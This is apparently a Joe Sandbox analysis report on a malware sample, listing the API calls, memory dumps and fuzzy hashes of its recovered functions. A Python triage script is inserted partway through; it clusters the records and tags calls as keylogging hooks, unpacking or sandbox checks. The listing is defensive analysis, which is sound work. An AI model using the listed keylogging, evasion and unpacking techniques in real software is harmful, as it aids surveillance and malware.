                                                                                              • _getenv.LIBCMT ref: 00401ABA
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                              • Module32First.KERNEL32 ref: 00401C48
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                              • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                              • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                              • _malloc.LIBCMT ref: 00401EBA
                                                                                              • _memset.LIBCMT ref: 00401EDD
                                                                                              • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                              • API String ID: 1430744539-2962942730
                                                                                              • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                              • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                              • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                              • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                              • String ID:
                                                                                              • API String ID: 2598563909-0
                                                                                              • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                              • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                              • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                              • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                              • GetLastError.KERNEL32 ref: 00401940
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3322701435-0
                                                                                              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                              • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                              • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

                                                                                               Control-flow Graph
                                                                                               • Graph image not reproduced; recoverable blocks, in execution order: 2afe5742-2afe57df GetCurrentProcess, 2afe57e8-2afe581c GetCurrentThread, 2afe5825-2afe5859 GetCurrentProcess, 2afe5862-2afe587d call 2afe5922, 2afe5883-2afe58b2 GetCurrentThreadId, 2afe58bb-2afe591d. After each API block the flow either goes straight to the next block or passes through a short block (2afe57e1-2afe57e7, 2afe581e-2afe5824, 2afe585b-2afe5861, 2afe58b4-2afe58ba) that rejoins it.
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2AFE57CE
                                                                                              • GetCurrentThread.KERNEL32 ref: 2AFE580B
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2AFE5848
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 2AFE58A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: dc8c464fc02b001dee373a3e08f22c43c15f9b61557ab6d5df33d76f67a27fc0
                                                                                              • Instruction ID: 1f380c47c72f1b27e76c8b839daa88599ccb3de040190d38e58d3215b9de7f95
                                                                                              • Opcode Fuzzy Hash: dc8c464fc02b001dee373a3e08f22c43c15f9b61557ab6d5df33d76f67a27fc0
                                                                                              • Instruction Fuzzy Hash: 0C5168B09013498FDB44DFA9C688BDEBFF1EF89300F248559D459A72A0D778A980CF65

                                                                                               Control-flow Graph
                                                                                               • Graph image not reproduced; recoverable blocks, in execution order: 2afe5750-2afe57df GetCurrentProcess, 2afe57e8-2afe581c GetCurrentThread, 2afe5825-2afe5859 GetCurrentProcess, 2afe5862-2afe587d call 2afe5922, 2afe5883-2afe58b2 GetCurrentThreadId, 2afe58bb-2afe591d. After each API block the flow either goes straight to the next block or passes through a short block (2afe57e1-2afe57e7, 2afe581e-2afe5824, 2afe585b-2afe5861, 2afe58b4-2afe58ba) that rejoins it.
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2AFE57CE
                                                                                              • GetCurrentThread.KERNEL32 ref: 2AFE580B
                                                                                              • GetCurrentProcess.KERNEL32 ref: 2AFE5848
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 2AFE58A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 9fd00cf4669e5a62901a32fc4707d19b35ecb56ffd9bb919f5caf9e88da555c5
                                                                                              • Instruction ID: 4907449664c7050fbf875ad56563b8f3d244933af39552ad6c1f59c3342bbb66
                                                                                              • Opcode Fuzzy Hash: 9fd00cf4669e5a62901a32fc4707d19b35ecb56ffd9bb919f5caf9e88da555c5
                                                                                              • Instruction Fuzzy Hash: 585147B09007498FDB04DFA9D688BDEBBF1AB88310F208569D419A73A0D7789980CF65
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 0040AF80
                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                               • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1411284514-0
                                                                                              • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                              • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                              • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                              • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2041127198.000000002AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AB10000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2ab10000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5755a27f0cbfea9f4ca205cbd6b8c9c3cfcc4bb4ca8234e63447f1a2917c6d75
                                                                                              • Instruction ID: e380a79efc5c180d291a09bb32ee4850473cab8dafabf28a513f830f55e40af3
                                                                                              • Opcode Fuzzy Hash: 5755a27f0cbfea9f4ca205cbd6b8c9c3cfcc4bb4ca8234e63447f1a2917c6d75
                                                                                              • Instruction Fuzzy Hash: 9F414831D043958FCB01DF79D4946DEBFF1AF8A310F1486AAD444E7291DB389845CBA1
                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 2AB1AEDF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2041127198.000000002AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AB10000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2ab10000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              • Opcode ID: eaa1bfab2b1bd5e723416e3744a7875c32bb967ad26355cbcec62f7f14b6a1b5
                                                                                              • Instruction ID: e2bca44f647ea09ce0fbd4e5bf39527ebb02e519f1b0b2d8d4f0b7b83fb9b723
                                                                                              • Opcode Fuzzy Hash: eaa1bfab2b1bd5e723416e3744a7875c32bb967ad26355cbcec62f7f14b6a1b5
                                                                                              • Instruction Fuzzy Hash: D851BD31600205CFC704EF29D488A9ABBF2EF89314F1185A9E405EB371DB34EC84DBA0
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2AFE1BA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 011fa03c1e21589daf2a9783d970412af9daa6890a1c913a2997754b8e496a54
                                                                                              • Instruction ID: 327c49ec9890f5c5a27798d3b88aaafff225e9667d33723ab318e688da3948d6
                                                                                              • Opcode Fuzzy Hash: 011fa03c1e21589daf2a9783d970412af9daa6890a1c913a2997754b8e496a54
                                                                                              • Instruction Fuzzy Hash: F251D3B1D00349DFDB14CFAAD994ADEBFB6BF48314F24822AE818AB210D7759845CF54
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2AFE1BA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 5123aa86ff3f7fd7ee1784a49873574845f4d8cb5028e6b73dd7d8d2e906f89b
                                                                                              • Instruction ID: c45e737e0cae1645e3fd96b89970c6043537ee90ae44433fd8c494769410d187
                                                                                              • Opcode Fuzzy Hash: 5123aa86ff3f7fd7ee1784a49873574845f4d8cb5028e6b73dd7d8d2e906f89b
                                                                                              • Instruction Fuzzy Hash: B241C2B1D003099FDB14DF9AC984ADEBBB6BF48354F20822AE818AB210D7749845CF94
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 2AFE68E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: 7f861be4e2394756e8ba3fa21e62092bb6c5ee81e993c139adc8d971a1a694f5
                                                                                              • Instruction ID: aa01d4afecda11b4fdf00e8133f0b550c94bcf7221b727c95ef303f293be8b5f
                                                                                              • Opcode Fuzzy Hash: 7f861be4e2394756e8ba3fa21e62092bb6c5ee81e993c139adc8d971a1a694f5
                                                                                              • Instruction Fuzzy Hash: 5A4149B5900349DFCB44DF99C988A9ABBF5FF88314F24C459D518AB321D778A941CFA0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard
                                                                                              • String ID:
                                                                                              • API String ID: 220874293-0
                                                                                              • Opcode ID: 0a277b3f5c2f5d5b4164a0809c96bf30dfc77440d4010f65d4858b6875d37747
                                                                                              • Instruction ID: 22478e834c80875d638b4590b147bf36bd3d5b6f4f72c7c18fa74e42a273b537
                                                                                              • Opcode Fuzzy Hash: 0a277b3f5c2f5d5b4164a0809c96bf30dfc77440d4010f65d4858b6875d37747
                                                                                              • Instruction Fuzzy Hash: 903105B0D01348EFDB14DF99CA94BCEBBF5AF48314F208069E508AB254D7746945CF55
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard
                                                                                              • String ID:
                                                                                              • API String ID: 220874293-0
                                                                                              • Opcode ID: f5f4fb0291ab004a3139e27be87dc02cc1f1530727dd47bb5c627ac4296945b1
                                                                                              • Instruction ID: df843c81951e9dc0345c8b20f8bdc952bc69e3f25ae2128782b90ac720d7e196
                                                                                              • Opcode Fuzzy Hash: f5f4fb0291ab004a3139e27be87dc02cc1f1530727dd47bb5c627ac4296945b1
                                                                                              • Instruction Fuzzy Hash: 2431F1B0D01348EFDB14DF99CA94BCEBBF5AF48314F208069E508AB294DB786945CF95
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2AFE5A1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: ba403e6cfbf3d82431fab521b7c9e9fae89d2c52f6575a0cb70faa6d43359024
                                                                                              • Instruction ID: e92caf769b5b5732fdcc98b364697b25943a76693929afbcf1a892c5cf234d0d
                                                                                              • Opcode Fuzzy Hash: ba403e6cfbf3d82431fab521b7c9e9fae89d2c52f6575a0cb70faa6d43359024
                                                                                              • Instruction Fuzzy Hash: 0E2116B5900258DFDB10CFA9D984ADEBFF8EF48310F14815AE958A7310C378A940CF65
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2AFE5A1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: aa858ae446b3f2dbaa38bac1c8e1b834b55b7b6a47dd44f7f7ed62fd8e99b6bf
                                                                                              • Instruction ID: a8e240910bfa57f84a590517a284a8dcdc26a3e60ae8139d442e64e93856bb1b
                                                                                              • Opcode Fuzzy Hash: aa858ae446b3f2dbaa38bac1c8e1b834b55b7b6a47dd44f7f7ed62fd8e99b6bf
                                                                                              • Instruction Fuzzy Hash: FC21F5B59003089FDB10CF9AD584ADEFFF4EB48320F10801AE918A3310D378A950CFA4
                                                                                              APIs
                                                                                              • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 2AFE8FDB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
• API String ID: 2559412058-0
• Opcode ID: 51c99f5dea51766071cfb98a0e7c6b197a98b1bceb39afb56c6e104bec0f800b
• Instruction ID: 57e922f8c06780dc955385b5886112350b4ea820897cbd8d7cccb06a8d3d2702
• Opcode Fuzzy Hash: 51c99f5dea51766071cfb98a0e7c6b197a98b1bceb39afb56c6e104bec0f800b
• Instruction Fuzzy Hash: C42138B1D002499FCB04DF99D944BEEFBF5EF88320F108429E559A7250C778A940CFA5
APIs
• DeleteFileW.KERNEL32(00000000), ref: 2A4926A0
Memory Dump Source
• Source File: 0000000B.00000002.2040730858.000000002A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2a490000_xrbjyllC.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: b6398ff36d4b5e312d9c60f17d25edd3fdd01a0fbdc29552984ce83bf6f07a75
• Instruction ID: 7d97795a51332b5c37eaf1d4adb596c31434f956b4bed6220fd088160d8ef779
• Opcode Fuzzy Hash: b6398ff36d4b5e312d9c60f17d25edd3fdd01a0fbdc29552984ce83bf6f07a75
• Instruction Fuzzy Hash: EF2124B1C0065A9FCB14DFAAD5447EEFFF0AF48320F11816AD858A7650D738A950CFA4
APIs
• SetWindowsHookExA.USER32(?,00000000,?,?), ref: 2AFE8FDB
Memory Dump Source
• Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0
• Opcode ID: f6e2ea979c0aef89e9b9c0ea10a725108ef7daf8f975061130be4aa2248af9c6
• Instruction ID: 043d4f79e18e402c4a4fbd7090077586d50e4671e4a64d68514fd07d0c8cd1e9
• Opcode Fuzzy Hash: f6e2ea979c0aef89e9b9c0ea10a725108ef7daf8f975061130be4aa2248af9c6
• Instruction Fuzzy Hash: 6B2136B1D002499FCB04DF9AD944BEEFBF5EF88320F10842AE459A7250C778A940CFA5
APIs
• VirtualProtect.KERNEL32(?,?,?,?), ref: 24F19464
Memory Dump Source
• Source File: 0000000B.00000002.2036287383.0000000024F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 24F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24f10000_xrbjyllC.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: ddd62ec90c4838b84d1bdf5f9ad0793f49b26070bdc6aade9e84b8bfe2cdc078
• Instruction ID: 891bb9dff18b0b3a728b6110cfb3743b258bcf26de5a8efc4b1c10ed7f2e96c3
• Opcode Fuzzy Hash: ddd62ec90c4838b84d1bdf5f9ad0793f49b26070bdc6aade9e84b8bfe2cdc078
• Instruction Fuzzy Hash: 6C11F4B19002499FDB10DFAAC580AEEFBF5EF88320F10842AD459A7250C774A945CFA5
APIs
• DeleteFileW.KERNEL32(00000000), ref: 2A4926A0
Memory Dump Source
• Source File: 0000000B.00000002.2040730858.000000002A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2a490000_xrbjyllC.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: 055a9683a86d48371b4e9cc45f9e94f0b2e9615a04402d5baf58787d18092acb
• Instruction ID: 9d315b0d48fef97a78ebc4242e10ea7e2b7b04f6e77a787facea40876e219218
• Opcode Fuzzy Hash: 055a9683a86d48371b4e9cc45f9e94f0b2e9615a04402d5baf58787d18092acb
• Instruction Fuzzy Hash: 941133B1C0065A9FCB10DF9AD540BAEFFF4BF48320F11816AD858A7650D738A950CFA5
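The records above are Joe Sandbox's per-function Similarity data: each function recovered from a memory dump is keyed by the API it calls, an Opcode ID, and two fuzzy hashes. The two DeleteFileW records (both at ref 2A4926A0) carry different Opcode IDs but agree in 57 of the 70 hex digits of their Instruction Fuzzy Hash, while DeleteFileW and SetWindowsHookExA agree in only 43. The script below is an added example, not part of the report or of Joe Sandbox: it parses records in this layout (the sample is copied from the four records above, abbreviated to the fields it uses, with Source File and Snapshot File lines left out), groups them by a nibble-wise hash similarity that is this example's own assumption (Joe Sandbox does not publish its metric), and tags the API IDs with the behaviour the report's signatures associate with them.

```python
"""Triage helper for Joe Sandbox per-function Similarity records (added example, not
part of the report). Nibble-wise hash comparison is this script's own assumption."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: four records copied from the report above, abbreviated to the fields used here.
SAMPLE = """\
APIs
• DeleteFileW.KERNEL32(00000000), ref: 2A4926A0
Similarity
• API ID: DeleteFile
• Opcode ID: b6398ff36d4b5e312d9c60f17d25edd3fdd01a0fbdc29552984ce83bf6f07a75
• Instruction Fuzzy Hash: EF2124B1C0065A9FCB14DFAAD5447EEFFF0AF48320F11816AD858A7650D738A950CFA4
APIs
• SetWindowsHookExA.USER32(?,00000000,?,?), ref: 2AFE8FDB
Similarity
• API ID: HookWindows
• Opcode ID: f6e2ea979c0aef89e9b9c0ea10a725108ef7daf8f975061130be4aa2248af9c6
• Instruction Fuzzy Hash: 6B2136B1D002499FCB04DF9AD944BEEFBF5EF88320F10842AE459A7250C778A940CFA5
APIs
• VirtualProtect.KERNEL32(?,?,?,?), ref: 24F19464
Similarity
• API ID: ProtectVirtual
• Opcode ID: ddd62ec90c4838b84d1bdf5f9ad0793f49b26070bdc6aade9e84b8bfe2cdc078
• Instruction Fuzzy Hash: 6C11F4B19002499FDB10DFAAC580AEEFBF5EF88320F10842AD459A7250C774A945CFA5
APIs
• DeleteFileW.KERNEL32(00000000), ref: 2A4926A0
Similarity
• API ID: DeleteFile
• Opcode ID: 055a9683a86d48371b4e9cc45f9e94f0b2e9615a04402d5baf58787d18092acb
• Instruction Fuzzy Hash: 941133B1C0065A9FCB10DF9AD540BAEFFF4BF48320F11816AD858A7650D738A950CFA5
"""
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Yara matches"}
REF_RE = re.compile(r"\bref: ([0-9A-Fa-f]+)$")  # trailing call-site address on an API line

@dataclass
class FuncRecord:
    api_calls: list[str] = field(default_factory=list)
    api_id: str = ""
    opcode_id: str = ""
    instr_hash: str = ""

def parse_records(text: str) -> list[FuncRecord]:
    """Walk the report text; a record is closed by its Instruction Fuzzy Hash line."""
    records, cur, section = [], FuncRecord(), ""
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
        elif section == "APIs" and REF_RE.search(line):
            cur.api_calls.append(line)
        elif line.startswith("API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur.instr_hash = line.split(":", 1)[1].strip().upper()
            records.append(cur)
            cur = FuncRecord()
    return records

def nibble_similarity(h1: str, h2: str) -> float:
    """Fraction of hex digits equal at the same position (assumed metric, not Joe Sandbox's)."""
    if not h1 or len(h1) != len(h2):
        return 0.0
    return sum(a == b for a, b in zip(h1, h2)) / len(h1)

def cluster_by_instruction_hash(records: list[FuncRecord], threshold: float = 0.8) -> list[list[FuncRecord]]:
    """Greedy single linkage: a record joins the first cluster holding a close enough member."""
    clusters: list[list[FuncRecord]] = []
    for rec in records:
        for cl in clusters:
            if any(nibble_similarity(rec.instr_hash, m.instr_hash) >= threshold for m in cl):
                cl.append(rec)
                break
        else:
            clusters.append([rec])
    return clusters

# API IDs seen in this report, mapped to the behaviour the call points at.
CAPABILITY_TAGS = {
    "HookWindows": "installs a Windows hook (global keyboard hook, keylogging)",
    "ProtectVirtual": "changes page protections (unpacking / self-modifying code)",
    "GlobalMemoryStatus": "queries physical RAM size (a common VM/sandbox check)",
    "DeleteFile": "deletes a file (dropper or self cleanup)",
}

def flag_capabilities(records: list[FuncRecord]) -> dict[str, list[str]]:
    """Map each tagged behaviour to the call-site addresses (`ref:`) where it occurs."""
    out: dict[str, list[str]] = {}
    for rec in records:
        tag = CAPABILITY_TAGS.get(rec.api_id)
        if tag:
            out.setdefault(tag, []).extend(REF_RE.search(c).group(1) for c in rec.api_calls)
    return out
```

`cluster_by_instruction_hash(parse_records(SAMPLE))` returns three clusters: the two DeleteFileW records together, and SetWindowsHookExA and VirtualProtect each on their own. Note that even unrelated stubs in these 2Axxxxxx dumps share roughly 60 percent of their hash digits, so the 0.8 threshold is calibrated against this report's own baseline rather than a constant to reuse elsewhere.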
APIs
• GlobalMemoryStatusEx.KERNEL32 ref: 2AB1AEDF
Memory Dump Source
• Source File: 0000000B.00000002.2041127198.000000002AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AB10000, based on PE: false
Joe Sandbox IDA Plugin
